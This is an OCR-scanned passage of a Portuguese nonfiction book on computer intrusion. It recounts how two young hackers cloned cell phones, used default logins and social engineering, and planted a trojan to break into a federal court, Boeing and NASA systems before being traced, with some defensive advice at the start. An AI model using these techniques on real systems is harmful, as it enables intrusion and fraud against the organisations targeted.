• Adware (disponivel de www.lavasoftusa.com ) 

Audite sistemas para verificar a integridade do software. Funcionarios ou insiders mal-intencionados 
poderiam substituir arquivos ou aplicativos cruciais do sistema operacional que poderiam ser usados para 
driblar os controles de seguranęa. William e Danny mudaram aplicativos do PC Anywhere para funcionar sem 
exibir um icone no system tray a firn de nao serem detectados. Os oficiais do presidio nunca perceberam que 
cada movimento era monitorado periodicamente enquanto Danny e William estavam virtualmente atentos. 

Em algumas circunstancias, pode ser adequado conduzir uma auditoria de integridade c usar um aplicativo 
de terceiros que avise aos funcionarios certos quando qualquer mudanęa e feita nos arquivos e aplicativos do 
sistema na Mista de alerta'. 

Privilegios excessivos. Em ambientes baseados no Windows, muitos usuarios finais estao conectados a 
contas de administrador local em seus equipamentos. Essa pratica, embora mais conveniente, possibilita a um 
insider entediado instalar um keystroke logger ou monitorar rede (sniffer) em qualquer sistema em que tenha 
privilegios de administrador local. Os atacantes distantes tambem podem enviar programas perigosos ocultos 
em um anexo de e-mail, que pode ser aberto por um usuario desavisado. A ameaęa desses anexos pode ser 
minimizada usando-se a regra do 'menor privilegio', o que significa que tanto usuarios quanto programas 
devem ter os menores privilegios possiveis para executar as tarefas exigidas. 

O resultado 

Em algumas situaęoes, o senso comum diz que medidas complexas de seguranęa sao uma perda de 
tempo. Em uma escola militar, por exemplo, voce nao esperaria que o corpo de estudantes estivesse repleto de 
pessoas a procura de qualquer oportunidade para enganar ou desafiar as regras. Em uma escola de ensino 
fundamental, voce nao esperaria que alunos de 10 anos entendessem mais de seguranęa de computador que 
o guru da equipe de tecnologia. 

E, numa prisao, voce nao esperaria que os detentos, vigiados de perto e vivendo sob regras rigidas, 
encontrassem meios nao só de entrar na Internet, mas tambem ficassem horas seguidas, dia 
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após dia, ouvindo musica, vendo filmes, comunicando-se com mulheres e aprendendo cada vez mais sobre 
computadores. 

Morał da historia: se voce e encarregado da seguranęa de computadores em qualquer escola, grupo de 
trabalho, empresa ou outra entidade, tem de considerar a ideia de que alguns adversarios mal-intencionados, 
inclusive alguem dentro de sua organizaęao, esta procurando aquela pequena rachadura na parede, a ligaęao 
mais fraca de sua cadeia de seguranęa para violar a rede. Nao suponha que todos estejam jogando conforme 
as regras- Faęa o que for efetivo, em termos de custo, para evitar invasoes potenciais, mas nao se esqueęa de 
continuar alerta para detectar o que voce deixou passar. Os mal-intencionados estao contando com sua 
distraęao, 
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Entao entrei na sala cheia de oflciais e perguntei: "Voces reconhecem algum 
destes nomes?". Li uma lista de nomes. Um oficial federal explicou: "Sao os 
Juizes do Forum Distrital dos Estados Unidos em Seattle". E eu disse: "Bem, 
tenho um arquivo de senhas aqui e 26 foram yioladas". Eles ficaram brancos. 

Don Boelling. Boeing Aircraft 


Mau e Costa nao estavam planejando atacar a Boeing Aircraft, mas aconteceu. No entanto. o resultado 
daąuele e de outros incidentes que se seguiram em uma serie de atividades de hacker serve de advertencia. Eles 
poderiam ser garotos-propaganda de uma campanha para advertir outros hackers jovens demais a avaliar as 
conseąuencias de suas aęoes. 

Costa Katsaniotis comeęou a aprender a mexer com computador ąuando ganhou um Commodore Vic 20 aos 
11 anos e comeęou a programar para melhorar o desempenho da maąuina. Ainda peąueno, desenvolveu um 
software que permitia a um amigo ver uma lista de conteudos do disco rigido do computador dele. "Foi ai que 
realmente comecei a lidar com computaęao, e adorava ter computador, porque ele 'faz as coisas fimcionarem'." E 
nao era apenas programaęao: ele examinava o hardware, sem medo de perder os parafusos, "porque eu comecei a 
desmontar coisas quando tinha tres anos", contou. 

A mae de Costa o matriculou em uma escola particular crista onde estudou ate a oitava serie e entao foi para 
uma escola publica. Com pouca idade, suas preferencias musicais incluiam o U2 (foi o seu primeiro album, e ele 
ainda e grandę fa da banda) e tambem Def Leppard, alem de "algumas musicas dark"; ja suas preferencias em 
relaęao a computaęao se ampliavam para abarcar "aquilo que eu pode-ria fazer com numeros de telefone". Alguns 
garotos mais velhos tinham aprendido sobre extenders 800-WATS, numeros de telefone que podiam usar para 
fazer ligaęoes gratuitas de longa distancia. 
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Costa adorava computadores e tinha um dom natural para entende-los. Talvez a ausencia do pai contribuisse 
para o grandę interesse do adolescente por um mundo no qual ele tivesse total controle. 

Entao, no colegio, eu dei um tempo e comecei a pensar em meninas. Mas sempre fui ligado em 
computadores e estava sempre mexendo neles. Só comecei a me aprimorar no hacking quando 
ganhei um computador em que podia mexer a yontade, que foi o Commodore 128. 

Costa conheceu Matt — Charles Matthew Anderson — em um bulletin board system (BBS), em Washington. 
"Fomos amigos por mais ou menos um ano. Conversavamos por telefone e trocavamos mensagens no BBS antes 
de realmente nos conhecermos pessoalmente." Matt — cujo codinome e 'Cerebrum' — descreve sua infancia 
como "bem normal". O pai dele era engenheiro na Boeing e tinha um computador em casa que Matt podia usar. E 
facil imaginar que o pai ficasse tao incomodado com as preferencias musicais do menino ("industrial e alguma 
coisa dark") que nem percebeu a trajetória perigosa que Matt seguia no computador. 

Comecei aprendendo a fazer programaęoes basicas quando tinha uns 9 anos. Passei a maior parte 
da adolescencia mexendo com imagens e musica no computador. Essa e uma das razoes por que 
gosto de computadores ainda hoje — o hacking daquela coisa de multimidia e realmente divertido. 

A primeira vez que me envolvi em hacking foi no colegio, penetrando pelo lado phreaking dele, 
aprendendo a aproveitar a rede de telefonia usada pelos professores e administradores para fazer 
ligaęoes a longa distancia. Eu me envolvi muito com isso no colegio. 

Matt terminou o colegio e ficou entre os dez melhores alunos da classe. Entrou na Uniyersidade de 
Washington e comeęou a aprender sobre o passado da computaęao: computaęao mainframe. Na faculdade, com 
uma conta legitima numa maquina Unix, comeęou a aprender sozinho sobre Unix, "com alguma ajuda de sites 
Web e BBS do submundo". 

Phreaking 

Depois de se unirem, parecia que Matt e Costa caminhavam na direęao errada pelo hacking no sistema de 
telefonia, uma atiyidade conhecida como 'phreaking'. Uma noite. Costa recorda, os dois sairam para fazer o que os 
hackers chamam de 'dumpster diving', revirando o lixo deixado fora das torres de transmissao das empresas de 
telefonia celular. "No lixo, entre pó de cafe e outras coisas que fediam, obtiyemos uma lista de toda a torre e de 
cada numero de telefone" — o numero de telefone e o ESN (Electronic Serial Number), que e um identificador 
unico atribuido a cada telefone celular, Como gemeos que se lembram de um evento partilhado na infancia, Matt 
interrompe a conyersa: "Eram numeros de teste que os tecnicos usavam para yerificar a foręa do sinal. Eles 
tinham celulares exclusivos daquela torre". 


62 
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Os rapazes compraram telefones celulares OKI 900 e um dispositivo para gravar uma nova programaęao nos 
chips de computador dos telefones. Eles nao se limitaram a programar novos numeros; tambem instalaram um 
upgrade especial nos chips que lhes permitia programar qualquer numero de telefone desejado e um numero ESN 
em cada um dos aparelhos. Ao programar os telefones para os numeros especiais de teste que tinham descoberto, 
eles conseguiram um servięo gratuito de telefonia celular "O usuario escolhe qual o numero que quer usar para 
fazer a chamada, Se precisassemos, poderiamos mudar para outro numero rapidamente", disse Costa. 

(Isso e o que chamo "o piano Kevin Mitnick de telefonia celular" — zero por mes, zero por minuto, mas voce 
pode acabar pagando um preęo alto no finał, se e que me entende...) 

Com essa reprogramaęao, Matt e Costa podiam fazer todas as ligaęoes que quisessem com tele-fone celular, 
em qualquer lugar do mundo. Se as ligaęoes se completassem, seriam registradas como chamadas oficiais da 
empresa de celular. Sem taxas, sem questionamentos. Como todo phreaker de telefone ou hacker gosta. 

Indo para o tribunal 

Ir parar no tribunal e a ultima coisa que qualquer hacker quer, E eu sei muito bem disso. Costa e Matt 
acabaram na justięa ainda no inicio de sua atividade conjunta como hackers, mas em outro sentido. 

Alem de dumpster diving e phreaking, os dois amigos frequentemente ajustavam seus computadores para war 
dialing (discagem ininterrupta), procurando modems de discagem que pudessem ser conectados a sistemas de 
computador a serem invadidos. Eles podiam verificar ate 1.200 numeros de telefone em uma noite. Com suas 
maquinas discando sem parar, eles corriam todos os telefones com o mesmo prefixo em dois ou tres dias. Quando 
voltavam para suas maquinas, os logs de computador mostravam os numeros de telefone dos quais tinham obtido 
resposta. "Eu estava preparando meu war dialer para escanear um prefixo em Seattle, 206-553", disse Matt. 
"Todos aqueles numeros de telefone pertencem a agencias federais. Entao, só o prefixo do telefone ja era um dado 
quente, porque permitia descobrir os computadores do govemo federal." Na verdade, eles nao tinham uma razao 
particular para verificar aquelas agencias do governo. 

Costa: Eramos garotos. Nao tinhamos grandes planos. 

Matt: Jogamos a rede no mar para ver que tipo de peixe podiamos pegar, foi mais 

ou menos isso. 

Costa: Era uma coisa do tipo "O que podemos fazer esta noite?", "O que podemos 

escanear esta noite?" 

Um dia, Costa viu seu war dialer conectar-se e notou que o programa tinha discado para um computador que 
devolvia um banner dizendo algo como 'U.S. District Courthouse' (Juizo Federal de Primeira Instancia). Tambem 
dizia: "Esta e uma propriedade federal". Ele pensou: "Isso parece 
interessante". 

Mas como entrar no sistema? Eles ainda precisavam do nome e da senha de um usuario. "Acho que foi o Matt 
que adivinhou", diz Costa. A resposta veio facil demais — um nome do usuario; 
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'public'; senha: 'public'. Entao havia esse banner assustador, muito forte, dizendo que o site era de propriedade 
federal, mas sem nenhuma seguranęa real que barrasse a porta, 

"Quando entramos no sistema deles, conseguimos o arquivo da senha", diz Matt. Eles obtiveram facilmente 
os nomes e as senhas usados pelos juizes. "Os juizes analisavam resumos de informaęoes naquele sistema 
judiciario e podiam examinar informaęoes de juri ou procurar relatos de casos. 

Percebendo o risco. Matt diz: "Nao fomos longe demais nas exploraęoes", Pelo menos, nao naquele 
momento, 


Hóspedes do hotel 

Enquanto isso, os garotos estavam ocupados com outras areas. "Urna das coisas que tambem pusemos em 
risco foi urna cooperativa de credito." Matt descobriu um padrao nos numeros dos códigos que facilitava fazer 
ligaęoes telefónicas a custa da cooperativa- Eles tambem tinham planos para entrar no sistema de computador do 
Department of Motor Vehicles (Departamento de Veiculos Motorizados) "e ver que tipo de carteiras de 
habilitaęao e coisas parecidas podiamos fazer". 

Eles continuaram a aperfeięoar suas habilidades e a invadir computadores. "Entravamos em muitos 
computadores da cidade. Entramos em revendedoras de carros. Ah, e havia um hotel na area de Seattle. Eu liguei 
para eles e passei por tecnico da empresa que fazia o software de reservas do hotel. Conversei com urna das 
recepcionistas e expliquei que estavamos tendo algumas dificuldades tecnicas e que ela nao conseguiria fazer o 
servięo corretamente se nao se adiantasse e fizesse algumas mudanęas." 

Com essa conhecida manobra em engenharia social, Matt conseguiu facilmente a informaęao necessaria para 
se conectar ao sistema. "O nome do usuario e a senha eram 'hotel' e 'aprender'," Aquelas eram as senhas-padrao 
dos projetistas de software, que nunca mudavam. 

A invasao nos computadores do primeiro hotel deu-lhes um bom conhecimento do software de reservas, que 
passou a ser bastante usado. Quando os rapazes escolheram outro hotel como alvo, meses depois, descobriram 
que aquele tambem poderia estar usando o software que ja conheciam. Eles imaginaram que o hotel poderia estar 
usando a mesma senha-padrao. E estavam certos. De acordo com Costa: 

Entramos no computador do hotel. Eu tinha urna tela igual a que eles tinham la. Entao, entrei e 

reservei uma suitę, uma das mais caras, de trezentos dólares o pernoite, com vista para o mar e um 

peąueno bar com pia e tudo. Usei um nome falso e deixei anotado que um depósito de quinhentos 

dólares em dinheiro tinha sido feito para reserya do quarto. Reservei por uma noite de arrasar. 

Ficamos la praticamente o firn de semana todo, curtimos e esvaziamos o bar. 

O acesso ao sistema de computador do hotel tambem lhes fomeceu informaęoes sobre os hóspedes que 
tinham estado la, "inclusive informaęoes financeiras". 

Antes de sair do hotel, os rapazes pararam na recepęao e tentaram obter de volta o "depósito em dinheiro". 
Quando o funcionario disse que o hotel enyiaria um cheque, eles deram um endereęo falso e sairam. 
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"Nunca fomos condenados por isso", diz Costa, acrescentando: "Sorte que as normas sobre prescrięao estao 
em vigor". Remorso? Dificilmente. "Naąuele hotel ainda tivemos uma peąuena compensaęao a mais pelo bar," 

Abrindo uma porta 

Depois daąuele firn de semana agitado, os rapazes voltaram animados para seus computadores. Queriam 
descobrir o que mais podiam fazer com o hack no Juizo Federal de Primeira Instancia. Logo constataram que o 
sistema operacional do computador do tribunal tinha sido comprado de uma empresa que chamaremos de 
Subsequent. O software tinha uma especificaęao embutida que desencadearia uma ligaęao telefónica para a 
Subsequent quando fossem necessarios patches de software. Por exemplo: "Se um cliente de um computador 
Subsequent comprasse um tire wali e o sistema operacional precisasse de patches para que o firewall funcionasse, 
a empresa tinha um metodo de se conectar ao seu sistema corporativo para obter os patches. Basicamente, era 
assim que fimcionava", explicou Costa. 

Matt tinha um amigo, outro programador C, que sabia desenvolver um Cavalo de Tróia — um software que 
fomece um segredo para um hacker voltar a um computador no qual ja tenha entrado anteriormente. Isso e muito 
pratico quando as senhas sao trocadas ou outras medidas sao tomadas para bloquear o acesso. Pelo computador 
no Forum Distrital, Matt enviou o Cavalo de Tróia para o computador corporativo da Subsequent. O software foi 
projetado de modo a "captar tambem todas as senhas e escreve-las num arquivo secreto, alem de nos permitir um 
root bypass (acesso administrador) caso ficassemos travados". 

Entrar no computador da Subsequent lhes trouxe um bonus inesperado: acesso a uma lista de outras empresas 
que usavam o sistema operacional da Subsequent. Ouro puro. "Ele nos informava a que outras maquinas 
poderiamos ter acesso." Uma das empresas da lista era uma empresa local gigante onde o pai de Matt trabalhava: 
a Boeing Aircraft. 

"Conseguimos o nome de usuario e a senha de um engenheiro da Subsequent, e eles trabalhavam nas cabines 
que ele havia vendido para a Boeing. Descobrimos que tinhamos acesso a nomes e a senhas de login de todas as 
cabines da Boeing", disse Costa. 

A primeira vez que Matt ligou para o numero de telefone que fazia conexoes extemas ao sistema Boeing, teve 
sorte e acertou em cheio. 

A ultima pessoa que se conectou nao tinha desligado o modem adequadamente, de modo que, 

quando disquei, na verdade tinha um shell Unix de alguem. Pensei: "Uau, de repente estou 

seguindo as pegadas do cara!". 

(Alguns dos primeiros modems de discagem nao eram configurados para desligar automaticamente do 
sistema assim que uma pessoa se desconectava. Quando jovem, sempre que eu encontrava esses tipos de 
configuraęoes de modem, fazia a conexao do usuario cair enviando um comando para um comutador de uma 
companhia telefónica, ou por engenharia social, fazendo um tecnico de frame puxar a conexao. Assim que a 
ligaęao era interrompida, eu discava e tinha acesso a conta que estava conectada. Matt e Costa, por sorte, haviam 
simplesmente topado com uma conexao que ainda estava ligada.) 
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Ter o shell Unix de um usuario significava que eles estavam dentro do firewall, com o computa-dor parado, 
aguardando instruęoes. Matt recorda: 

Entao fui em frente e usei a senha dele em algumas maquinas locais onde consegui obter acesso root 

[administrador de sistema]. Com o root podia usar algumas outras contas, tentar ir para algumas 

outras maquinas que aquelas pessoas acessavam olhando a historia de seu shell. 

Se foi coincidencia o modem estar on-line ąuando Matt ligou, o que ocorreu na Boeing quando Matt e Costa 
comeęaram a invasao foi urna coincidencia ainda maior. 

Vigiando as barricadas 

Naquele momento, a Boeing Aircraft estava promovendo um seminario importante sobre seguranęa em 
computadores para um publico que incluia funcionarios de corporaęoes, da Justięa, do FBI e do Servięo Secreto. 

Quem estava supervisionando a sessao era Don Boelling, um homem que conhecia de perto as medidas e os 
esforęos da seguranęa relacionados a computadores da Boeing para poder aprimora-los. Don lutava pela 
seguranęa interna ha varios anos, "Nossa rede de seguranęa na area de computaęao era como em qualquer outro 
lugar, basicamente nula. E eu estava realmente preocupado com isso." 

Em 1988, quando trabalhava na recem-formada Boeing Electronics, Don teve urna reuniao com o presidente 
da divisao e varios vice-presidentes e disse-lhes: "Vejam o que eu posso fazer com sua rede". Ele invadiu linhas 
de modem e mostrou que nao havia senha nelas, alem de provar tambem que podia atacar as maquinas que 
quisesse. Os executivos viram varios computadores que tinham urna conta de visitante com a senha 'visitante'. E 
ele demonstrou como urna conta como aquela facilita e> acesso a arquivo de senhas e o download para qualquer 
outra maquina, mesmo fora da empresa, 

Don foi convincente. "Assim teve inicio o programa de seguranęa em computaęao na Boeing", ele nos 
contou. Mas o programa estava apenas no inicio, quando Matt e Costa comeęaram as invasoes. Ele estava tendo 
"muita dificuldade em convencer a direęao a investir recursos e a financiar a seguranęa do sistema 
informatizado". O episódio que envolveu Matt e Costa foi "o que me ajudou a conseguir isso". 

O papel corajoso como porta-voz da seguranęa levou Don a organizar um curso inedito sobre aspectos legais 
da invasao de computadores na Boeing. "Um agente do governo perguntou se queriamos ajudar a formar um 
grupo de funcionarios da policia e da industria para gerar informaęoes. A organizaęao tinha por objetivo fazer os 
policiais conhecerem aspectos legais relativos a tecnologia da computaęao, envolvendo tecnicas de investigaęao 
de alta tecnologia. E eu fui urna figura-chave na implantaęao disso tudo. Tinhamos representantes da Microsoft, 
da US West, da companhia telefónica, de alguns bancos e de varias organizaęoes financeiras diferentes. Os 
agentes do Servięo Secreto tambem partilharam seu conhecimento sobre alta tecnologia de contravenęoes." 
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Don conseguiu que a Boeing patrocinasse os encontros, que foram realizados em um dos centros de 
treinamento da empresa. "Trouxemos cerca de trinta e cinco representantes da area juridica para cada curso, que 
tinha uma semana de duraęao, sobre como apreender um computador, como redigir o mandado de busca e 
apreensao, como executar os aspectos legais em computaęao, o trabalho todo. E trouxemos Howard Schmidt, que 
mais tarde foi recrutado para a equipe do Homeland Security, para dar esclarecimentos ao presidente sobre 
assuntos como crime cibemetico." 

No segundo dia de aula, o pager de Don parou de funcionar "Liguei para a administradora, Phyllis, e ela 
disse: 'Coisas estranhas estao acontecendo nesta maquina e nao consigo imaginar do que se trata'." Inumeros 
diretórios ocultos pareciam como arquivos de senha, ela explicou. E um programa chamado Crack estava 
funcionando em segundo piano. 

Eram mas noticias. O Crack e um programa para quebrar a criptografia de senhas. Ele tenta uma lista de 
palavras ou uma lista de dicionario e permutaęoes de palavras como Billi, Bill2, Bill3 na tentativa de descobrir a 
senha. 

Don mandou seu colega Ken ("nosso guru da seguranęa Unix") dar uma olhada. Cerca de uma hora mais 
tarde, Ken enviou uma mensagem para Don dizendo: "E melhor voce vir para ca. Parece que a coisa vai bem mai. 
Tivemos varias senhas violadas e elas nao pertencem a Boeing. Ha uma em particular que voce precisa ver". 

Enquanto isso, Matt tentava trabalhar dentro da rede de computadores da Boeing. Depois de obter acesso a 
privilegios da administradora de sistema, "era facil acessar outras contas olhando algumas das outras maquinas 
que as pessoas tinham acessado". Esses arquivos frequentemente traziam os numeros de telefone de fomecedoras 
de software e outros computadores para os quais a maquina ligaria. "Um diretório primitivo de outros hosts que 
estavam la", diz Matt. Logo os dois hackers estavam acessando os bancos de dados de varias empresas. "Pusemos 
o dedo em varios lugares", diz Costa. 

Don nao queria abandonar o seminario e pediu a Ken que enviasse um fax do que ele estava vendo na tela. 
Quando a transmissao chegou, Don sentiu-se aliviado por nao reconhecer nenhuma das identidades de usuario. 
Entretanto, ficou intrigado com o fato de que muitas delas comeęavam com "Judge" [juiz]. Entao, entendeu: 

Estava pensando: "Oh,, meu Deus!". Entao entrei na sala cheia de oflciais e perguntei: "Voces 
reconhecem algum destes nomes?". Li uma lista de nomes. Um oficial federai explicou: "Sao os 
Juizes do Forum Distrital dos Estados Unidos em Seattle". E eu disse: "Bem. tenho um arquivo de 
senhas aqui e 26 foram yioladas". Eles ficaram brancos. 

Don ficou observando um agente do FBI com quem havia trabalhado enquanto dava alguns 
telefonemas. 

Ele ligou para o Forum Distrital e falou com o administrador de sistema. Podia ouvi-lo do outro 
lado da linha dizendo; "Nao, de jeito nenhum. Nao estamos ligados na Internet. Eles nao podem ter 
nossos arquivos de senha. Nao creio que sejam 



A arte de invadir 


nossas maquinas M . E Rich afirmava: "Nao, e a maquina de voces. Temos os arquivos de 
senha". E o cara insistia; "Nao, isso nao e possivel. As pessoas nao conseguem entrar em 
nossas maquinas". 

Don olhou para a lista em suas maos e viu que a senha root — conhecida somente pelos 
administradores de sistema — tinha sido yiolada. Ele mostrou para Rich. 

Rich falou ao telefone: M Sua senha root e '2ovens'?". Fez-se um silencio sepulcral do outro lado 
da linha. Só ouyimos um 'tum' quando a cabeęa dele bateu na mesa. 

Quando voltou para a sala de aula, Don percebeu um tumulto se formando. "Eu disse: 'Bem, pessoal, 
e hora de fazermos um treinamento pratico*." 

Acompanhado por urna parte da classe, Don preparou-se para a batalha. Primeiro, foi ate o centro de 
computaęao em Bellevue, onde o firewall estava localizado, "Encontramos a conta que estava pondo o 
programa Crack em funcionamento, aquela em que o atacante estava entrando e saindo, e o endereęo IP 
de onde vinha." 

A essa altura, com o programa de quebra de senhas fimcionando no computador da Boeing, os dois 
hackers haviam entrado no restante do sistema da empresa, fazendo "spider-webbing" para acessar 
centenas de computadores. 

Um dos computadores que o sistema Boeing conectou nao estava nem em Seattle, mas do outro lado 
do pais. de acordo com Costa: 

Era um dos computadores lab de Jet Propulsion em Langley Research Labs, da Nasa, em 
Virginia, um Cray YMP5, uma das Jóias da coroa. Aquele foi um de nossos momentos 
decisivos. 

Todos os tipos de coisas passam pela sua cabeęa. Alguns dos segredos poderiam me deixar 
rico, morto ou realmente encrencado. 

As pessoas que participavam do seminario aguardavam a vez para se divertir no centro de 
computadores. Ficaram atordoadas quando a equipe de seguranęa da Boeing descobriu que seus atacantes 
tinham conseguido acesso ao Cray, e Don mai podia acreditar nisso. "Conseguimos descobrir com 
rapidez, em uma ou duas horas, aquele ponto de acesso e os pontos de acesso ao firewall." Enquanto isso, 
Ken preparou armadilhas yirtuais no firewall para identificar quais outras contas os atacantes tinham 
yiolado. 

Don ligou para a companhia telefónica local e pediu para ter uma "escuta com rastreamento" nas 
linhas de modem da Boeing que os atacantes estavam usando. Desse modo ele poderia captar o numero 
do telefone de onde yinham as chamadas. Os telefonistas concordaram sem hesitar. "Eles faziam parte de 
nossa equipe e sabiam quem eu era, nao fizeram perguntas. Essa e uma das yantagens de participar dessas 
equipes de obseryancia do cumprimento da lei." 

Don colocou laptops nos circuitos entre os modems e os computadores, "basicamente para armazenar 
todas as teclas digitadas num arquivo". Ele ate conectou impressoras Okidata em cada maquina 
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"para imprimir tudo o que eles fizessem em tempo real. Eu precisava disso para ter evidencias. Voce nao 
consegue argumentar com papel como pode fazer com um arquivo eletrónico". Talvez isso nao seja 
surpreendente quando voce pensa no que e mais provavel que um corpo de jurados acredite: num arquivo 
eletrónico ou num documento impresso no momento do incidente. 

O grupo voltou a se reunir no seminario por algumas horas e Don descreveu a situaęao e as medidas 
defensivas tomadas. Os oficiais estavam adquirindo experiencia pratica, em nivel de pós-graduaęao, em aspectos 
legais relacionados a computaęao. "Voltamos ao trabalho para verificar o que tinhamos, e enquanto eu estava la 
com dois oficiais federais e meu colega, o modem pifou. Bingo, esses caras entraram, ligaram-se na conta", disse 
Don. 

A companhia telefónica local rastreou Matt e Costa ate a casa deles. A equipe ficou observando enquanto os 
hackers entraram no firewall. Eles se transferiram, entao, para a Universidade de Washington, onde entraram na 
conta de Matt Anderson. 

Matt e Costa tinham tornado precauęoes que, segundo acreditavam, evitariam que suas chamadas fossem 
rastreadas. Em vez de discar diretamente para a Boeing, eles ligavam para computadores do Forum Distrital e 
entao direcionavam a ligaęao do Forum para a Boeing. Eles imaginaram que, "se tivesse alguem nos monitorando 
na Boeing, eles provavelmente estariam tendo muita dificuldade de imaginar de onde vinha nossa ligaęao", disse 
Costa. 

Eles nao tinham ideia de que cada movimento era vigiado e registrado enquanto Matt discava para o Forum, 
de la para a Boeing e entao transferia a ligaęao para sua conta pessoal de estudante. 

Ja que eramos tao novatos no sistema [do Forum Distrital] e a senha e o nome do usuario eram 

'public', na epoca nao pensei que isso fosse uma ameaęa ou que eu estiyesse sendo descuidado. 

Aquela discagem direta foi o que lhes forneceu o rastro do meu apartamento, e foi ai que tudo se 

desmantelou. 

Parecia que a equipe de Don ia explodir de satisfaęao quando Matt comeęou a ler o e-mail em sua conta de 
estudante. "No e-mail dele constava tudo sobre suas aęoes como hacker e as respostas de outros hackers." 

Os oficiais estavam sentados la, morrendo de rir, porque aqueles garotos eram arrogantes e nao 

sabiam que tinham sido pegos. E estavamos vendo tudo em tempo real, acumulando evidencias. 

Enquanto isso, Don destacava as folhas da impressora, pedia a todos que assinassem como testemunhas e 
selava como prova. "Em menos de seis horas desde o momento em que soubemos dessa invasao, ja tinhamos 
como incriminar os garotos." 

A gerencia da Boeing nao achou graęa. "Eles estavam assustados demais e queriam acabar com os hackers: 
'Tire-os dos computadores e desligue tudo isso agora mesmo'," Don conseguiu convence-los de que seria mais 
sensato esperar. "Eu disse: 'nao sabemos em quantos lugares esses caras tern entrado. Precisamos monitora-los 
por um tempo e descobrir o que esta acontecendo e o que eles fizeram'." Quando se considera o risco envolvido, 
prova-se a notavel capacidade profissional — e foi isso que a gerencia reconheceu em Don. 


*9 
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Sob vigilancia 

Um dos oficiais Federais que participavam do seminario obteve autorizaęao para grampear os telefones de 
Matt e Costa. Mas as fitas foram apenas uma parte do esforęo. Dessa vez o govemo federal estava levando o caso 
muito a serio. A aęao estava parecendo um filme de espionagem ou de suspensę policial: eąuipes de agentes do 
FBI foram enviados ao campus. Disfaręados de estudantes, eles seguiram Matt pelo campus, observando suas 
atitudes a ponto de, mais tarde, conseguirem comprovar que em determinado momento ele estava usando um 
computador especifico no campus, Se nao fosse assim, seria facil afirmar: "Nao fui eu — muitas pessoas usam 
aquele computador todos os dias". Isso tinha acontecido antes, 

Na Boeing, a equipe de seguranęa tomou todas as precauęoes possiveis, O objetivo nao era manter os 
meninos a distancia, mas vigia-los de perto para continuar a reunir provas e assegurar-se de que eles nao 
causariam nenhum dano. Don explica: "Os principais pontos de entrada de todos os nossos computadores estavam 
ligados, de modo que o administrador do sistema ou o computador nos enviava uma mensagem por pager ou nos 
informava que alguma atividade estava sendo realizada". O bipe do pager tomou-se um grito de guerra nas 
'frentes de batalha'. Os membros da equipe avisavam imediatamente algumas pessoas de uma lista de chamada 
para que soubessem que os hackers estavam na area novamente. Varias vezes, o grupo de Don seguiu 
eletronicamente as aęoes de Matt e Costa pela Universidade de Washington — onde as pessoas-chave tinham sido 
in-formadas — pela Internet, de ponto a ponto, Era como estar ao lado dos dois enquanto eles faziam a invasao. 

Don decidiu vigia-los por mais quatro ou cinco dias, porque "basicamente os tinhamos sob controle e eles 
nao estavam fazendo nada que eu considerasse extremamente perigoso, embora tivessem acesso consideravel e 
pudessem fazer, se quisessem". 

Mas Costa logo percebeu que algo estava para acontecer: 

Uma noite, minha namorada e eu estavamos em meu apartamento, assistindo a TV. Era uma noite 
de verao, a janela estava aberta e, e engraęado, ela olhou para fora... e notou um carro no 
estacionamento do Pay & Save. Bem, cerca de uma hora mais tarde, ela olhou para fora outra vez e 
disse: "Ha um carro la fora com uns sujeitos dentro, e ele estava la uma hora atras". 

Costa desligou a TV, apagou as luzes e comeęou a gravar os agentes do FBI vigiando sua casa, Um pouco 
mais tarde, viu um segundo carro estacionar perto do primeiro. Os homens nos dois carros conversaram 
rapidamente e entao foram embora. 

No dia seguinte, uma equipe de oficiais apareceu no apartamento de Costa. Quando ele perguntou se tinham 
mandado de busca, eles admitiram que nao, mas Costa, querendo parecer que estava colaborando, nao fez objeęao 
em ser interrogado. Ele nao se recusou, tambem, quando eles lhe pediram para ligar para Matt e conversar sobre 
atividades com telefones celulares enquanto eles gravavam tudo. 

Por que ele estaria disposto a ligar para seu melhor amigo e conversar sobre atividades ilegais tendo policiais 
na escuta? Simples: em uma brincadeira numa noite qualquer, jogando uma variaęao 
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do "E se?", os dois haviam previsto uma situaęao em que poderia ser perigoso falar abertamente e tinham 
inventado um código. Se um deles inclmsse 'nove, dez' na conversa, significaria "Perigo! Cuidado com o 
que fala*, (Eles escolheram o numero mais facil de lembrar, sendo um a menos que o numero do telefone 
de emergencia 911.) 

Logo, com o telefone grampeado e o gravador ligado. Costa discou para Matt. "Eu liguei para voce 
alguns minutos atras, as nove e dez, e nao consegui te encontrar", ele comeęou. 

Fechando o cerco 

A yigilancia da equipe da Boeing tinha descoberto que os hackers nao só estavam entrando no Forum 
Distrital dos Estados Unidos, mas tambem na Environmental Protection Agency (EPA - Agencia de 
Proteęao Ambiental). Don Boelling foi a EPA para dar a ma noticia. Assim como o administrador de 
sistema do Forum Distrital, o pessoal da EPA nao acreditava em nenhuma inyasao no seu sistema. 

Estayamos ayisando que as maquinas deles estayam comprometidas e, para eles, isso era 
Inconcebivel. Diziam: "Nao, nao". Consegui trazer o arquivo da senha com dez ou quinze 
senhas yioladas e passar-lhes a senha do administrador da rede. Eles estao prontos para 
atacar porque todas as seiscentas e tantas maquinas nos Estados Unidos estao ligadas a 
Internet pela mesma conta. Era uma conta root priyilegiada de sistema e todas as maquinas 
possuiam a mesma senha. 

Os oficiais que participavam do seminario estayam indo muito mais longe do que haviam imaginado. 
"Para os sujeitos que nao iam conosco a campo", disse Don, "todo dia yoltaramos para a sala de aula e 
contavamos em detalhes o que tinhamos feito. Eles sabiam em primeira mao tudo o que ocorria." 

O passado chama a atenęao 

Impressionado com a habilidade dos hackers, Don ficou surpreso ao saber que dois meses antes eles 
tinham ido parar na Justięa para responder a outras acusaęoes, e Costa havia recebido uma sentenęa de 
trinta dias de trabalho comunitario. 

E, no entanto, la estayam eles de volta yiolando a lei como se fossem invulneraveis. De que modo? 
Costa explicou que ele e Matt ja estayam preocupados porque havia muito mais coisas do que os 
promotores tinham descoberto. 

Era como uma grandę bola de neve da qual eles haviam descoberto um pequeno bloco de 
gelo. Eles nao sabiam que estayamos fazendo os telefones celulares, nao sabiam que 
tinhamos numeros de cartao de credito, nao sabiam por que nos tinham pego. Como Matt e 
eu Ja tinhamos conversado sobre nosso caso, combinamos o que iriamos dizer a eles. E entao 
nos safamos dessa inyasao de computador, nos diyertimos com isso. Foi estupidez. 
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Nos noticiarios 

Don estava dirigindo de Bellevue a fabrica da Boeing, onde ficava seu escritório, ąuando teve um choąue. 
"Sintonizei no noticiario Kiro e de repente ouvi esse furo de reportagem, de que dois hackers tinham invadido a 
Boeing e que estava sendo feita urna investigaęao Federal. Pensei: 'Droga!'." 

